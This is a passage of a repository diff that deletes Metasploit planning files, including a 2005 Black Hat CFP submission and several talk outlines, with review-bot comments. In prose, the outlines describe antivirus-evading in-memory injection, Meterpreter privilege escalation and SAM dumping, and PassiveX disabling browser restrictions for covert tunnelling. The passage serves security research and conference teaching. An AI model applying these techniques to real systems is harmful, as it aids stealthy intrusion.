i. Reverse and port-bind payloads still the most common
ii. Findsock style payloads still unused by PoC exploits
iii. Alternative communication vectors rarely discussed
c. Pivoting technology exists
i. Core ST described system call proxying in 2002
ii. Metasploit's (2.3) meterpreter provides basic network pivoting
C. What will we discuss?
1. Pre-exploitation Research
a. NOP generation
i. Opty2
b. Encoders
i. Additive feedback encoders
ii. Shikata Ga Nai
2. Post-Exploitation Research
a. Library Injection
i. Facilitates things like Meterpreter and VNC injection
b. VNC Injection
i. Introduced at blackhat04 with the Metasploit 2.2 release
c. Meterpreter & dN
i. The cross-platform post-exploitation suite
3. Payload Research
a. PassiveX
i. Taking advantage of ActiveX controls
b. Ordinal Stagers
i. Tiny network capable stagers
c. Egghunt (maybe?)
i. Small payload capable of locating a larger payload
ii. Useful for exploits with limited space
II. Pre-exploitation
A. OptyNop2
1. Creation and benefits of multi-byte nopsleds
B. Additive feedback encoders
C. Shikata Ga Nai
1. High permutation shellcode through simple dependency mappings
III. Post-exploitation
A. Library Injection
1. Overview
a. Paper published in 04/2004
b. Provides advanced code execution
c. Code can be written in any language that can compile down
to a shared object.
d. Allows developer to use all of the APIs exposed to a normal
application.
e. Detailed explanation can be found in included resources
(include lib inject paper)
2. Two types of library injection
a. On-Disk
i. Library is loaded from the target's harddrive or via a
file share.
ii. Can be detected by AV products due to fs access
b. In-Memory
i. Library is uploaded to the target and loaded from memory
without touching the disk
ii. Evades file system filter drivers, such as those
provided by AV companies
iii. Not touching the disk means no forensic trace
iv. VirtualLock prevents swapping to disk, but requires admin
3. In-memory library injection on Windows
a. System calls used by the library loader are hooked
i. NtCreateFile
ii. NtMapViewOfSection
iii. etc
b. Unique image name is used to identify the image to image that
is in memory
c. System call hooks are removed so that future injectino can
occur
d. Alternative approaches
i. Could do client-side relocations, but would need to handle
import processing
4. In-memory library injection on Linux/BSD
a. No known public implementations
b. Requires alternate approach
i. Hooking API routines not always possible -- symtab not
mapped into memory
ii. libc symbol version mismatches lead to linking nightmares
c. Client-side relocations seem most feasible
i. Remote side maps a region of memory and sends the client
the base address
ii. Client processes relocations and transmits the relocated
image as its mapped segment would appear
iii. Requires locating rtld base so that PLT lookups will
work
B. VNC Injection
1. Implements VNC as an injectable DLL
a. Uses RealVNC as the code-base
b. VNC communication uses the exploit connection
c. No physical trace is left of the VNC server
d. Can operate regardless of existing VNC installations
2. Easy way to illustrate insecurities
a. Suits understand mouse movement better than black box command
prompts
C. Meterpreter
1. Generic post-exploitation suite
a. Based on library injection
b. Uses the established exploit connection
i. Especially powerful with findsock payloads; no new connection
c. Executes entirely from memory
d. No new processes or file access required for the payload to
succeed
e. Detailed explanation can be found in included resources
(include meterpreter paper)
2. Extension system provides advanced automation support
a. No need to hand write tedious assembly
b. Existing native code can be ported to a meterpreter extension
3. Architecture
a. Design goals
i. Very flexible protocol; should adapt to extension requirements
ii. Exposure of a channelized communication system to extensions
iii. Stealth operation
iv. Should be portable to various operating systems
v. Client from one platform should work with server on another
platform
b. Protocol
i. Uses TLVs (Type-Length-Value) to support arbitrary data
passing.
ii. TLVs allow the packet parser to be oblivious to the structure
of the value field
iii. Type field is broken down into meta types
4. Core interface
a. Overview
i. Minimal interface to support the loading of extensions
ii. Implements the basic packet transmission and dispatching
facilities
iii. Exposes channel allocation and management to extensions
b. Advanced features
i. Migrating the server instance between processes
5. The ``stdapi'' extension
a. Overview
i. Included in Metasploit 3.0
ii. Provides access to some of the common subsystems of the
target operating system
iii. Allows for easy automation and implementation of robust
post-exploitation scripts
b. File System
i. File and directory interaction
ii. Files can be uploaded and downloaded between the
attacker and the target
c. Network
i. Transparent network pivoting
ii. Route table enumeration and manipulation
iii. Local interface enumeration
d. Process
i. Process execution, optionally with channelized IO
ii. Enumeration of running processes
iii. Modification of arbitrary memory
iv. Creation and modification of running threads
v. Loading and interacting with shared object files
e. Registry
i. General registry API access
ii. Opening, creating, and removing registry keys
iii. Setting, querying, and deleting registry values
iv. Enumeration of both keys and values
f. User interface
i. Disabling local user interaction via the keyboard
and/or mouse (similar to VNC)
ii. Idle timeout checking to see how long it's been
since the user did something interactive
6. The ``priv'' extension
a. Still in development
b. Exposes an interface to escalating local privileges
through local vulnerabilities
c. SAM dumping support similar to pwdump3
D. dN
1. Simple low-footprint post-exploitation tool
2. Useful to scope out execution enviroment, then bootstrap other tools
IV. Payload Research
A. PassiveX
1. Overview
a. Post-exploitation payload
b. A derivative of On-Disk library injection that uses
ActiveX controls
c. Supports arbitrary DLL injection in any language that can
be compiled as an ActiveX control (C++, VB, etc)
d. Detailed analysis can be found in included resources
(include passivex paper)
2. Payload Implementation
a. Disables iexplore Internet zone restrictions on
ActiveX controls
i. Modifies four registry values that are stored per-user
b. Launches a hidden iexplore at a URL with an embedded
OCX
i. The OCX does not have to be signed
ii. No user interaction is required
iii. OCX is automatically downloaded, registered, and loaded
into the browser's context
3. Sample HTTP tunneling ActiveX control
a. HTTP GET/POST used to build tunnel to attacker
i. Uses the WININET API
ii. Outbound traffic from target machine encapsulated in POST
request
iii. Inbound traffic from attacker encapsulated in GET response
iv. Proxy configuration automatically inherited
v. Requires HTTP server capable of performing encap/decap on the
HTTP packets
b. Streaming connection through HTTP tunnel can be created
i. socketpair doesn't exist natively on win32 but can be simulated
with a local listener
ii. Streaming abstraction allows advanced payloads to transparently
use the HTTP transport (Meterpreter, VNC)
iii. Local listener less covert, but highly beneficial
4. Pros
a. Bypasses restrictive outbound filters
b. Re-uses proxy configuration
c. Looks like normal user traffic
d. Allows full access to the win32 API like all forms of
library injection
5. Cons
a. Touches the disk
b. Requires administrative access
i. Internet Explorer prohibits the downloading of
ActiveX controls as non-admin
B. Windows Ordinal Stagers
1. Overview
a. Technique from Oded's lightning talk from core04
b. Uses static ordinals to locate winsock symbol addresses
c. Compatible with all versions of Windows
d. 92 byte reverse stager, 93 byte findsock stager
e. Detailed explanation can be found in included resources
(include spoonm ordinal paper)
2. Reverse Ordinal Stager
a. Walks InitOrderModuleList searching for ws2_32
b. Uses static ordinals to index the export table
c. Creates fd with socket
d. Chains connect and recv frames
e. Returns into buffer read in from file descriptor
C. Egghunting
1. Overview
a. Small stub payload that can search for a larger payload
b. Useful for exploits that have limited payload space but can
stash more payload elsewhere in memory
c. Example exploits include the IE object type vulnerability.
d. Goal is to safely search target address space for the larger
payload.
e. Larger payload is located by searching for an egg that is prepended
to it.
f. Detailed analysis can be found in included resources
(include egghunt paper)
2. Two primary methods of egghunting on Windows
a. SEH
1. 60 bytes in size, searches for an 8 byte egg, compatible with all
versions of Windows (including 9x)
2. Installs a custom exception handler
3. Begins walking the address space
i. When a bad address is encounter, the current pointer is
incremented by PAGE_SIZE
ii. When a mismatch of the egg is encountered, the current pointer
is incremented by one
4. Each address is compared against the 8-byte egg
i. Bad addresses will throw exceptions which will be handled
by the custom exception handler
5. When the egg is found, jump past the egg into the larger payload
b. System call
1. Very small stub (32 bytes), searches for an 8 byte egg, only
compatible with NT+
2. Uses a non-intrusive system call (NtDisplayString) to search validate
addresses
i. Same page walking logic as SEH is used
3. When the egg is found, jump past the egg into the larger payload
3. One primary method of egghunting on Linux
a. System call
1. 30 bytes in size, searches for an 8 byte egg
2. System call technique applies to other UNIX variants as well
3. Uses the sigaction system call to validate 16 bytes at once
4. Pros
i. Very small
5. Cons
i. Corner cases may cause it to be unstable
V. The Complete Picture - Metasploit 3.0
A. The power of pre-exploitation prepartion
1. Abstract NOP generation
2. Abstract payload encoding
3. Abstract exploit connection handlers
i. Bind handler
ii. Reverse handler
iii. Findsock handler
B. The power of exploit generalization
1. Standardized exploit creation interface
i. Robust target definitions
ii. Detailed exploit implementation information
iii. Entirely payload independent, no hardcoding paylaods
C. The power of post-exploitation automation
1. Complicated tasks made simple with scripting
i. Want to download a targets entire harddrive?
ii. Want to disable local user interaction?
iii. Want to upload and play an mp3 on the target?
iv. Want to 'be' on the target's network?
2. Standard interface means cross platform support
VI. Conclusion - where do we go from here?
A. Future Post-exploitation research
1. Mesh network support
2. Expansion of the stdapi described in this document
included resources:
http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
http://www.hick.org/code/skape/papers/meterpreter.pdf
http://www.hick.org/code/skape/papers/remote-library-injection.pdf
http://www.hick.org/code/skape/papers/passivex.pdf [not released yet]
http://www.metasploit.com/users/spoonm/ordinals.txt
cited material:
STRIDE:
http://www.ics.forth.gr/carv/acs/ACS/Activities/papers/stride-IFIP-SEC05.pdf
syscall proxy:
http://www.coresecurity.com/files/files/11/SyscallProxying.pdf
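Review bot: this outline file is a line-for-line duplicate of the "Detailed Outline" section of the Black Hat 2005 CFP submission that the same commit deletes further down (from "I. Introduction" through the "cited material" links), so removing it loses nothing that the other file did not already carry, and clearing out the obsolete dev directory is the right call. The one thing worth carrying forward before both copies go is the "included resources" block at the end of this hunk: the outline itself points to the egghunt, meterpreter, remote-library-injection and PassiveX papers and to spoonm's ordinals.txt as the detailed explanations for the library injection, Meterpreter TLV protocol, stdapi/priv extensions, ordinal stagers and egghunters it sketches, and after this commit the only copy of those five URLs in the repository is in svn history. Suggest moving them into the meterpreter or payload documentation in the same commit rather than dropping them with the rest of the directory.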

View File

@ -1,7 +0,0 @@
Skape is a lead software developer by day and an independent security researcher
by night. He joined forces with the Metasploit project in 2004 where his many
contributions have included the Meterpreter, VNC injection, and many other
payload advances. Skape has worked on a number of open-source projects and has
authored several papers on security related technologies. His current security
related intrerests include post-exploitation technologies, payload development
and optimization, and exploitation prevention technology.
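Review bot: this seven-line bio is a verbatim copy of the "Skape:" paragraph in the speaker bios of the CFP submission deleted below, differing only in the "intrerests" typo that the other copy spells correctly, so nothing unique is lost and the deletion is fine. If any part of the dev directory is meant to be kept as historical documentation, the CFP submission file is the one that subsumes both this bio and the separate outline file, and it would be the one to keep.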

View File

@ -1,673 +0,0 @@
Date of Submission:
04/2005
I would like to present this at:
USA 2005
Personal Information
Primary Speaker Name:
spoonm
Primary Speaker Title (if applicable):
Additional Speaker Name(s), Title(s) and Company(s) (if applicable):
skape
Speaking on Behalf of:
Primary Contact's Email:
spoonm@gmail.com
Primary Contact's Telephone:
Speaker's Email (if different from the primary speaker's email):
Speaker's Telephone (if different from the primary speaker's telephone):
Has the speaker spoken at a previous Black Hat event? Yes or No
Yes
Does the speaker have any professional speaking experience? Yes or No
Yes
If yes, please list the three most recent engagements.
- cansecwest 2005
- defcon 2004
- blackhat 2004
Has or will this presentation be seen in any form? If so, explain how this
presentation is different from previous versions, and where/when this material
has been seen before.
No
Will or has the speaker(s) be presenting at ANY event 30 days prior to this
conference? If yes, please specify which event and on what topic(s).
No
Presentation Information
Name of Presentation:
- Beyond EIP
Select the track(s) that your talk would be most appropriate for your topic (you
must select at least one of the nine):
- Deep Knowledge
- 0 Day Attack
How much time does your presentation require? 75 minutes, 90 minutes or 20
minutes (turbo track) (please specify)
90 minutes (could do 75 if necessary)
What are the three most important reasons why this is a quality Black Hat talk?
Reason 1:
Although we continue to publicly release much of our work, there is much
more involved under the hood than just what's released. Blackhat is the
perfect venue to discuss our ideas, research, design, and development in
detail. It's really important to be able to discuss the sort of things we've
thought very hard about and to present the conclusions that would otherwise
be taken for granted.
Reason 2:
The technology discussed in this presentation impacts a wide number of
security related fields including NIDS, HIPS, Anti-Virus, penetration
testing, and the exploit development cycle in general.
Reason 3:
Many of the audience members can't be fully engaged in the deep world of
security research. This is a chance for them to get a "view from the
trenches", and see what's actually happening on the attacker security front.
Audience members will get an idea of where technologies currently stand, how
they work, and what might be in store for the future.
Is there a demonstration? Yes or No
Yes
Are the speaker(s) releasing a new tool? Yes or No
Possibly, or will talk about many recent (within a year) releases.
Are the speaker(s) releasing a new exploit? Yes or No
No
Is there audience participation? Yes or No
No
What are your equipment needs?
1 projector.
Will you require more than 2 lcd projectors? Yes or No - if yes, please specify
how many
No
Will you require internet access? Yes or No
No
Will you require a white board? Yes or No
No
Will you require any special equipment? Yes or No - if yes, please specify.
No
Detailed Outline:
Note:
We've tried to include most of the topics that will be covered in our
presentation. However, many of these things will be discussed, but will not be
our main concentration. The majority of our presentation will be around topic
V. C, our new post-exploitation advances, and how they will be designed and
integrated into Metasploit 3. Metasploit 3 won't be finished in time for
Blackhat, but more important than the software itself is the work we've done
on developing the individual components that it will be built from.
This outline is pretty indepth, so it's hard to pick out all the nuggets of
coolness. We've developed many really useful technologies in the area of
payload development. These are things we've created since last year's
Blackhat, including many advances in polymorphic shellcode, and
high-permutation attacks.
I. Introduction
A. Who are we?
1. spoonm
2. skape
B. Exploit Technology
1. Three Phases of Exploitation
a. Pre-exploitation
b. Exploitation
c. Post-exploitation
2. Pre-exploitation - Preparing the payload
a. NOP generation
b. Payload encoders
c. Connection handler initialization
3. Exploitation - Leveraging the vulnerability
a. Stack overflows
c. Heap overflows
b. SEH overwrites
d. Arbitrary pointer overwrites
4. Post-Exploitation - Manipulating the target
a. Command shell redirection
b. Arbitrary command execution
c. Pivoting payloads
d. Advanced payload interaction
B. Where do we stand?
1. Pre-exploitation
a. Robust and elegant encoders do exist
i. SkyLined's alpha-numeric encoder
ii. Spoonm's Shikata Ga Nai
b. Payload encoders generally taken for granted
i. Most encoders are static with a variable key
ii. IDS able to signature static decoder stubs
c. NOP generation hasn't publically changed much
i. PoC exploits generally use predictable nops, if any
ii. ADMmutate easily signatured by most NIDS (Snort, Fnord)
iii. Not considered very important to many researchers
d. NIDS deployments are playing chase the tail
i. The mouse always has the advantage; NIDS is reactive
ii. Advanced nops and encoders push NIDS to its limits
2. Exploitation
a. Techniques have become very mature
i. Linux/BSD exploitation techniques largely unchanged
ii. Win32 heap overflows now more reliable (oded/shok)
iii. Win32 SEH overwrites make exploitation easy, even on XPSP2
b. Exploitation topics have been beaten to death
3. Post-exploitation
a. Common payloads are limited
i. Command shell interaction has poor automation support
ii. Limited to the command set that the interpreter provides
iii. Bounded by the utilities installed on the target machine
iv. Restrictive environments (chroot) can hinder command execution
v. HIPS vendors becoming more adept at detecting basic payloads
- LoadLibraryA from the stack, etc (mcafee 8.0i)
b. Communication vectors largely unchanged
i. Reverse and port-bind payloads still the most common
ii. Findsock style payloads still unused by PoC exploits
iii. Alternative communication vectors rarely discussed
c. Pivoting technology exists
i. Core ST described system call proxying in 2002
ii. Metasploit's (2.3) meterpreter provides basic network pivoting
C. What will we discuss?
1. Pre-exploitation Research
a. NOP generation
i. Opty2
b. Encoders
i. Additive feedback encoders
ii. Shikata Ga Nai
2. Post-Exploitation Research
a. Library Injection
i. Facilitates things like Meterpreter and VNC injection
b. VNC Injection
i. Introduced at blackhat04 with the Metasploit 2.2 release
c. Meterpreter & dN
i. The cross-platform post-exploitation suite
3. Payload Research
a. PassiveX
i. Taking advantage of ActiveX controls
b. Ordinal Stagers
i. Tiny network capable stagers
c. Egghunt (maybe?)
i. Small payload capable of locating a larger payload
ii. Useful for exploits with limited space
II. Pre-exploitation
A. OptyNop2
1. Creation and benefits of multi-byte nopsleds
B. Additive feedback encoders
C. Shikata Ga Nai
1. High permutation shellcode through simple dependency mappings
III. Post-exploitation
A. Library Injection
1. Overview
a. Paper published in 04/2004
b. Provides advanced code execution
c. Code can be written in any language that can compile down
to a shared object.
d. Allows developer to use all of the APIs exposed to a normal
application.
e. Detailed explanation can be found in included resources
(include lib inject paper)
2. Two types of library injection
a. On-Disk
i. Library is loaded from the target's harddrive or via a
file share.
ii. Can be detected by AV products due to fs access
b. In-Memory
i. Library is uploaded to the target and loaded from memory
without touching the disk
ii. Evades file system filter drivers, such as those
provided by AV companies
iii. Not touching the disk means no forensic trace
iv. VirtualLock prevents swapping to disk, but requires admin
3. In-memory library injection on Windows
a. System calls used by the library loader are hooked
i. NtCreateFile
ii. NtMapViewOfSection
iii. etc
b. Unique image name is used to identify the image to image that
is in memory
c. System call hooks are removed so that future injectino can
occur
d. Alternative approaches
i. Could do client-side relocations, but would need to handle
import processing
4. In-memory library injection on Linux/BSD
a. No known public implementations
b. Requires alternate approach
i. Hooking API routines not always possible -- symtab not
mapped into memory
ii. libc symbol version mismatches lead to linking nightmares
c. Client-side relocations seem most feasible
i. Remote side maps a region of memory and sends the client
the base address
ii. Client processes relocations and transmits the relocated
image as its mapped segment would appear
iii. Requires locating rtld base so that PLT lookups will
work
B. VNC Injection
1. Implements VNC as an injectable DLL
a. Uses RealVNC as the code-base
b. VNC communication uses the exploit connection
c. No physical trace is left of the VNC server
d. Can operate regardless of existing VNC installations
2. Easy way to illustrate insecurities
a. Suits understand mouse movement better than black box command
prompts
C. Meterpreter
1. Generic post-exploitation suite
a. Based on library injection
b. Uses the established exploit connection
i. Especially powerful with findsock payloads; no new connection
c. Executes entirely from memory
d. No new processes or file access required for the payload to
succeed
e. Detailed explanation can be found in included resources
(include meterpreter paper)
2. Extension system provides advanced automation support
a. No need to hand write tedious assembly
b. Existing native code can be ported to a meterpreter extension
3. Architecture
a. Design goals
i. Very flexible protocol; should adapt to extension requirements
ii. Exposure of a channelized communication system to extensions
iii. Stealth operation
iv. Should be portable to various operating systems
v. Client from one platform should work with server on another
platform
b. Protocol
i. Uses TLVs (Type-Length-Value) to support arbitrary data
passing.
ii. TLVs allow the packet parser to be oblivious to the structure
of the value field
iii. Type field is broken down into meta types
4. Core interface
a. Overview
i. Minimal interface to support the loading of extensions
ii. Implements the basic packet transmission and dispatching
facilities
iii. Exposes channel allocation and management to extensions
b. Advanced features
i. Migrating the server instance between processes
5. The ``stdapi'' extension
a. Overview
i. Included in Metasploit 3.0
ii. Provides access to some of the common subsystems of the
target operating system
iii. Allows for easy automation and implementation of robust
post-exploitation scripts
b. File System
i. File and directory interaction
ii. Files can be uploaded and downloaded between the
attacker and the target
c. Network
i. Transparent network pivoting
ii. Route table enumeration and manipulation
iii. Local interface enumeration
d. Process
i. Process execution, optionally with channelized IO
ii. Enumeration of running processes
iii. Modification of arbitrary memory
iv. Creation and modification of running threads
v. Loading and interacting with shared object files
e. Registry
i. General registry API access
ii. Opening, creating, and removing registry keys
iii. Setting, querying, and deleting registry values
iv. Enumeration of both keys and values
f. User interface
i. Disabling local user interaction via the keyboard
and/or mouse (similar to VNC)
ii. Idle timeout checking to see how long it's been
since the user did something interactive
6. The ``priv'' extension
a. Still in development
b. Exposes an interface to escalating local privileges
through local vulnerabilities
c. SAM dumping support similar to pwdump3
D. dN
1. Simple low-footprint post-exploitation tool
2. Useful to scope out execution enviroment, then bootstrap other tools
IV. Payload Research
A. PassiveX
1. Overview
a. Post-exploitation payload
b. A derivative of On-Disk library injection that uses
ActiveX controls
c. Supports arbitrary DLL injection in any language that can
be compiled as an ActiveX control (C++, VB, etc)
d. Detailed analysis can be found in included resources
(include passivex paper)
2. Payload Implementation
a. Disables iexplore Internet zone restrictions on
ActiveX controls
i. Modifies four registry values that are stored per-user
b. Launches a hidden iexplore at a URL with an embedded
OCX
i. The OCX does not have to be signed
ii. No user interaction is required
iii. OCX is automatically downloaded, registered, and loaded
into the browser's context
3. Sample HTTP tunneling ActiveX control
a. HTTP GET/POST used to build tunnel to attacker
i. Uses the WININET API
ii. Outbound traffic from target machine encapsulated in POST
request
iii. Inbound traffic from attacker encapsulated in GET response
iv. Proxy configuration automatically inherited
v. Requires HTTP server capable of performing encap/decap on the
HTTP packets
b. Streaming connection through HTTP tunnel can be created
i. socketpair doesn't exist natively on win32 but can be simulated
with a local listener
ii. Streaming abstraction allows advanced payloads to transparently
use the HTTP transport (Meterpreter, VNC)
iii. Local listener less covert, but highly beneficial
4. Pros
a. Bypasses restrictive outbound filters
b. Re-uses proxy configuration
c. Looks like normal user traffic
d. Allows full access to the win32 API like all forms of
library injection
5. Cons
a. Touches the disk
b. Requires administrative access
i. Internet Explorer prohibits the downloading of
ActiveX controls as non-admin
B. Windows Ordinal Stagers
1. Overview
a. Technique from Oded's lightning talk from core04
b. Uses static ordinals to locate winsock symbol addresses
c. Compatible with all versions of Windows
d. 92 byte reverse stager, 93 byte findsock stager
e. Detailed explanation can be found in included resources
(include spoonm ordinal paper)
2. Reverse Ordinal Stager
a. Walks InitOrderModuleList searching for ws2_32
b. Uses static ordinals to index the export table
c. Creates fd with socket
d. Chains connect and recv frames
e. Returns into buffer read in from file descriptor
C. Egghunting
1. Overview
a. Small stub payload that can search for a larger payload
b. Useful for exploits that have limited payload space but can
stash more payload elsewhere in memory
c. Example exploits include the IE object type vulnerability.
d. Goal is to safely search target address space for the larger
payload.
e. Larger payload is located by searching for an egg that is prepended
to it.
f. Detailed analysis can be found in included resources
(include egghunt paper)
2. Two primary methods of egghunting on Windows
a. SEH
1. 60 bytes in size, searches for an 8 byte egg, compatible with all
versions of Windows (including 9x)
2. Installs a custom exception handler
3. Begins walking the address space
i. When a bad address is encounter, the current pointer is
incremented by PAGE_SIZE
ii. When a mismatch of the egg is encountered, the current pointer
is incremented by one
4. Each address is compared against the 8-byte egg
i. Bad addresses will throw exceptions which will be handled
by the custom exception handler
5. When the egg is found, jump past the egg into the larger payload
b. System call
1. Very small stub (32 bytes), searches for an 8 byte egg, only
compatible with NT+
2. Uses a non-intrusive system call (NtDisplayString) to search validate
addresses
i. Same page walking logic as SEH is used
3. When the egg is found, jump past the egg into the larger payload
3. One primary method of egghunting on Linux
a. System call
1. 30 bytes in size, searches for an 8 byte egg
2. System call technique applies to other UNIX variants as well
3. Uses the sigaction system call to validate 16 bytes at once
4. Pros
i. Very small
5. Cons
i. Corner cases may cause it to be unstable
V. The Complete Picture - Metasploit 3.0
A. The power of pre-exploitation prepartion
1. Abstract NOP generation
2. Abstract payload encoding
3. Abstract exploit connection handlers
i. Bind handler
ii. Reverse handler
iii. Findsock handler
B. The power of exploit generalization
1. Standardized exploit creation interface
i. Robust target definitions
ii. Detailed exploit implementation information
iii. Entirely payload independent, no hardcoding paylaods
C. The power of post-exploitation automation
1. Complicated tasks made simple with scripting
i. Want to download a targets entire harddrive?
ii. Want to disable local user interaction?
iii. Want to upload and play an mp3 on the target?
iv. Want to 'be' on the target's network?
2. Standard interface means cross platform support
VI. Conclusion - where do we go from here?
A. Future Post-exploitation research
1. Mesh network support
2. Expansion of the stdapi described in this document
included resources:
http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
http://www.hick.org/code/skape/papers/meterpreter.pdf
http://www.hick.org/code/skape/papers/remote-library-injection.pdf
http://www.hick.org/code/skape/papers/passivex.pdf [not released yet]
http://www.metasploit.com/users/spoonm/ordinals.txt
cited material:
STRIDE:
http://www.ics.forth.gr/carv/acs/ACS/Activities/papers/stride-IFIP-SEC05.pdf
syscall proxy:
http://www.coresecurity.com/files/files/11/SyscallProxying.pdf
Abstract:
When we built Metasploit, our focus was on the exploit development process. We
tried to design a system that helped create reliable and robust exploits. While
this is obviously very important, it's only the first step in the process. What
do you do once you own EIP? Our presentation will concentrate on the recent
advancements in shellcode, IDS/firewall evasion, and post-exploitation systems.
We will discuss the design and implementation of the technologies that enable
complex payloads, such as VNC injection, and the suite of tools we've built upon
them. We will then present a glimpse of the next generation of Metasploit, and
how these new advances will serve as its backbone.
Blog Entry:
Blog entry, Stardate April, 2005
We have recently been on a new shellcode kick, but this time it's not about
making them smaller. We're currently working on building very powerful new
post-exploitation shellcode and toolkits, and a very powerful unified API to
expose their functionality. This will allow us to diverge from precanned
payloads, which will in turn allow users to quickly build powerful and portable
post-exploitation tools. We have built strongly upon our Windows DLL
injection, and are working on extending similar functionality to the land of
Unix. We're also working hard on the next version of Metasploit, which follows
this same philosophy of embedability and extensablity, allowing users to build
their own tools on top of our framework. Our previous work was all about exploit
frameworks. In our new approach we are really building more of a hacker tool
framework, allowing very strong automation and customization.
Supporting File(s):
Additional files/materials? No
Speaker's Bio(s):
Spoonm:
Since late 2003, spoonm has been one of the core developers behind the
Metasploit Project. He is responsible for much of the architecture in version
2.0, as well as other components including encoders, nop generators, and a
polymorphic shellcode engine. A full-time student at a northern university,
spoonm spends too much of his free time on security research projects.
Skape:
Skape is a lead software developer by day and an independent security researcher
by night. He joined forces with the Metasploit project in 2004 where his many
contributions have included the Meterpreter, VNC injection, and many other
payload advances. Skape has worked on a number of open-source projects and has
authored several papers on security related technologies. His current security
related interests include post-exploitation technologies, payload development
and optimization, and exploitation prevention technology.
Transfer of Copyright
I warrant that the above work has not been previously published elsewhere, or if
it has, that I have obtained permission for its publication by Black Hat, Inc.
and that I will promptly supply Black Hat, Inc. with wording for crediting the
original publication and copyright owner.
If I am selected for presentation, I hereby give Black Hat, Inc. permission to
duplicate, record and redistribute this presentation; including, but not limited
to, the conference proceedings, conference CD, video, audio, hand outs(s) to the
conference attendees for educational, on-line and all other purposes.
Yes, I, (insert primary speaker name), have read the above and agree to the
Transfer of Copyright.
Agreement to Terms of Speaking Requirements
If I am selected to speak, I understand that I must complete and fulfill the
following requirements or I will forfeit my honorarium:
1) I will submit a completed presentation in Powerpoint format for publication
in the printed conference proceedings by the date specified in the CFP Letter of
Acceptance.
2) I understand if I fail to submit a completed presentation by the date
specified in the CFP Letter of Acceptance, I may be replaced by an alternate
presentation or, if allowed to present, will forfeit $250 of my honorarium.
3) I will submit a completed (and possibly updated) presentation, a copy of the
tool(s) and/or code(s), and a reference to all of the tool(s), law(s), Web sites
and/or publications referenced to at the end of my talk and as described in this
CFP submission for publication on the conference CD by the date specified in the
CFP Letter of Acceptance.
4) I will include a detailed bibliography as either a separate document or
included within the presentation of all resources cited and/or used in my
presentation.
5) I will be on hand and accessible to delegates during Black Hat social events
including, but not limited to, luncheons and receptions.
6) I will complete my presentation in the time allocated to me - not ending 15
minutes before or running 5 minutes over the time allocation.
7) I understand that Black Hat will provide 2 lcd projectors, 2 screens,
microphone, and video switch box. I understand that I am responsible for
providing all other necessary equipment, including laptops and machines, to
complete my presentation.
8) I will submit, within 5 days of the completion of the conference, any
updated, revised or additional presentation(s) or materials that were used in my
presentation but not included on the conference CD or conference proceedings.
I, spoonm, have read the above and understand and agree
to the terms as detailed in the Agreement to Terms of Speaking Requirements.
Agreement to Terms of Speaking Remuneration
1) I understand that Black Hat will only pay for one roundtrip coach class
airfare per presentation.
2) I understand that if I choose to arrange the airfare myself, I must first
receive approval from the Conference Administrator or I will not be reimbursed
for the airfare. I understand that if I wish to be reimbursed for airfare, I
must supply a valid receipt in the form of a travel agency issued air itinerary
and/or ticket receipt with the airfare printed on it. I understand that there is
a $750 cap for airfare and I will be reimbursed for up to that amount.
3) I understand that if I choose to travel by automobile I will receive $0.32
per mile, roundtrip, as reimbursement. If I travel by rail or bus I will be
reimbursed for the cost of the ticket price.
4) I understand that Black Hat will pay for one hotel room for three nights at
the official venue hotel.
5) I understand that I will be required to provide the hotel with a valid credit
card on check in to secure the room and any and all additional costs incurred by
me (including but not limited to room service, phone line usage, room internet
access, movies, etc) WILL NOT be reimbursed by Black Hat.
6) I understand that the person listed as the primary speaker will be required
to complete a W9 form (only if a US citizen) in order to be paid. Non-US
citizens will be paid via wire transfer (or you may choose to be paid with a
company check).
7) I understand that Black Hat will issue one payment per presentation and the
check will be issued to the person listed as the primary speaker. Payment will
be made net 30 from the end of the conference.
8) I understand that the name and address on the W9 or wire transfer is where
the payment will be sent.
9) I understand that if I am employed by an official Black Hat sponsor, that I
will not receive any compensation for travel, hotel accommodations or an
honorarium from Black Hat, Inc.
10) I understand that should my talk be determined to be a vendor or sales pitch
that I will not receive any reimbursement for travel, hotel accommodations or an
honorarium.
11) I understand that should my talk be selected for the "Turbo Talks" I will
ONLY receive entrance to the Briefings. As a "Turbo Talks" presenter, I WILL NOT
receive a speaking honorarium or compensation for hotel or travel.
Yes, I, spoonm, have read the above and understand and
agree to the terms as detailed in the Agreement to Terms of Speaking
Remuneration or I will forfeit my honorarium.


@ -1,81 +0,0 @@
Title:
Bitten on the ASP
(How NOT to deploy ASP.NET applications)
Intro:
Who
BreakingPoint
Metasploit
What
ASP.Net deployment issues
Default configuration
Common configuration flaws
Platform problems
Why
Widely deployed
Poorly researched
Lack of tools
Basics
Global default configuration file
Code separated into Applications
Applications override configuration file
Structure
Sample web application structure
Visual studio files
Deploy vs Copy
IIS Integration
Extension vs ASP.Net mappings
What files have no mapping?
Cryptography
MAC Key
Encryption Key
ViewState / Session Generation
Sessions
CookieLess
InProcess
StateServer
Possible flaws
SQL Database
Field lengths, character data
Sliding Sessions...
Florida example
Error Handling
Default settings
aspxerrorpath tricks
Information disclosure
Forms Authentication
?
ViewState Information
Data leak, MAC, etc.
Debugging
Debugging left enabled
Tracing left enabled!
Overview
Locking down ASP.Net is not hard
Thousands of sites arent doing it
Microsoft Terra ServerDopostback/rss.aspx
Microsoft Research
Summary
Vulns
Tools
Fixes
Done
IssueTracker.mdb


@ -1,75 +0,0 @@
Title:
Metasploit^3
Intro:
Who
BreakingPoint
Metasploit
What
Exploit framework evolution
Why
Exploits are commodities
Integration is the tricky part
Who needs a shell when...
Merge of two distinct users
Network admins
Penetration testers
Exploit Frameworks
Development platform for exploit code
Shrink exploit development time
Enable security research
Automation
Metasploit
Started off with ~7 exploits
v1 - 2,000 lines of perl
v2 - 40,000 lines of perl, 3,000 asm, 7,000 C
v3 - 80,000 lines of perl, 4,000 asm, 12,000 C
Exploit launcher
Modular components
Consistent interface
Three UI's
Metasploit^3
Complete rewrite in the Ruby language
Code compression ~40%
Completely OO, no more dirty perl tricks
Focused on simplicity, consistency, extensibility
Architecture
Rex Library
MSF Library
MSF Core
MSF Interfaces
Libraries
Create your own MSF app in ~5 lines of code :-)
Simple to work with any module programatically
Write standalone security apps using our libs
Concepts
Interfaces
Load and interact with modules
Jobs
Modules running in the background
Sessions
Interactive shells and more
Modules
Payloads
Encoders
Nops
Exploits
Auxiliary
Plugins
Extend anything at runtime
Examples
Reconnaisance module
Passive exploit modules
Handling multiple sessions


@ -1,77 +0,0 @@
\definecolor{Hexy110}{rgb}{0.431,0,0.568}
